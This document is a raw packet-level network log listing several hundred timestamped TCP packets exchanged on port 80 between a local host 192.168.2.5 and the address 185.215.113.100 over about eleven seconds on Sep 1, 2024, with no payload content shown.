Sep 1, 2024 20:54:41.331624985 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.415184975 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.415219069 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.415258884 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.415282011 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.428596020 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.428643942 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.428658009 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.428675890 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.428688049 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.534559965 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.534617901 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.534624100 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.534632921 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.534655094 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.534667015 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.633686066 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.633712053 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:41.633761883 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:41.633784056 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.302467108 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.302498102 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.302548885 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.302611113 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.302637100 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.302638054 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.302653074 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.302681923 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.302706003 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.302798986 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.302843094 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.303411007 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.303459883 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.503385067 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.503401041 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.503415108 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.503475904 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.503511906 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.503520966 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.503561974 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.503587961 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.503623962 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.702502966 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.702562094 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.702586889 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.702622890 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.786233902 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.786323071 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.786324024 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.786362886 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.947351933 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.947411060 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.947422028 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.947436094 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.947453022 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.947590113 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.947616100 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.947626114 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:42.947637081 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:42.947664976 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.154295921 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.154345036 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.154357910 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.154390097 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.154444933 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.154561043 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.154609919 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.154623985 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.154670000 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.154822111 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.154864073 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.374919891 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.375013113 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.375567913 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.375626087 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.375653028 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.375695944 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.375965118 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.375977039 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.375988007 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.376013041 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.376051903 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.704969883 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.704988003 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.705068111 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.705104113 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.705120087 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.705131054 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.705146074 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.705185890 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.705581903 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.705591917 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.705631018 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.790947914 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791007996 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.791028976 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791068077 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.791100025 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791141987 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.791172028 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791182995 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791193008 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791217089 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.791256905 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.791943073 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.791991949 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:43.792124033 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:43.792166948 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.007200956 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.007271051 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.007379055 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.007390022 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.007426977 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.007482052 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.007493019 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.007503033 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.007520914 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.007541895 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.008148909 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.008193016 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.008368969 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.008378983 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.008408070 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.480379105 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.480447054 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.481899023 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.481942892 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.625410080 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.625466108 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.625559092 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.625597954 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.662914991 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.662959099 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.662975073 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.663021088 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.663089991 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.663192034 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.663192034 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.663358927 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.663408995 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.663410902 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.663423061 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.663450003 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.663470984 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.663531065 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.663574934 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.709002018 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.711255074 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.823889017 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.824003935 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.824182987 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.857008934 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.857023001 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.857033968 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:44.857182980 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:44.857182980 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.234455109 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.234477997 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.234489918 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.234520912 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.234549046 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.234668016 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.234710932 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.234823942 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.234882116 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.235030890 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.235085011 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.235449076 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.235461950 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.235563040 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.235572100 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.235644102 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.307869911 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.307917118 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.307930946 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.307933092 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.307956934 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.307980061 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.447314978 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.447433949 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.447487116 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.447534084 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.447735071 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.447779894 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.447788000 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.447791100 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.447834969 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.843761921 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.843822002 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.843833923 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.843867064 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.887450933 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.887531996 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.887566090 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.887578011 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.887617111 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.888179064 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.888235092 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:45.888642073 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:45.888693094 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.058026075 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.058151007 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.058792114 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.058857918 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.350948095 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.350961924 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.351067066 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.351125956 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.351169109 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.351202011 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.351246119 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.351330996 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.351377964 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.499742031 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.499834061 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.499867916 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.499917030 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.583225965 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.583256960 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.583281994 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.583311081 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.755624056 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.755661011 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.755752087 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.755781889 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.833206892 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.833221912 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.833231926 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.833277941 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.833297968 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.948074102 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.948191881 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:46.948775053 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:46.948827028 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.035808086 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.035892963 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.035921097 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.035970926 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.072824001 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.072895050 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.072922945 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.072932959 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.072959900 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.072964907 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.072988033 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.073009014 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.138324022 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.138344049 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.138354063 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.138391972 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.138420105 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.277349949 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.277439117 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.277462006 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.277473927 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.277506113 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.277523041 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.341566086 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.341588020 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.341598034 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.341660976 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.341703892 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.472687960 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.472754002 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.472815990 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.472826958 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.472867012 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.554593086 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.554641008 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.554651022 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.554698944 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.554753065 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.686877966 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.686939001 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.686971903 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.686981916 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.687015057 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.687031984 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.762851000 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.762931108 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.763109922 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.763119936 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.763129950 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.763175964 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.763209105 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.922595978 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.922643900 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.922653913 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:47.922655106 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:47.922693014 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:48.360934973 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:48.360960960 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:48.360976934 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:48.361013889 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:48.361046076 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:49.869601011 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:49.869671106 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:49.869685888 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:49.869705915 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:49.869710922 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:49.869745970 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:49.869797945 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:49.869810104 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:49.869843006 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:51.737266064 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:51.737281084 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:51.737334013 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:51.977946043 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:51.977962971 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:51.977974892 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:51.978015900 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:51.978043079 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.169886112 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.169939041 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.170142889 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.170152903 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.170195103 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.170233965 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.170317888 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.361759901 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.361794949 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.361808062 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.361865997 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.361906052 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.361989021 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.362056971 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.362108946 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.552359104 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.552433014 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:52.552501917 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.552514076 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.552520990 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:52.552531958 CEST	80	49704	185.215.113.100	192.168.2.5
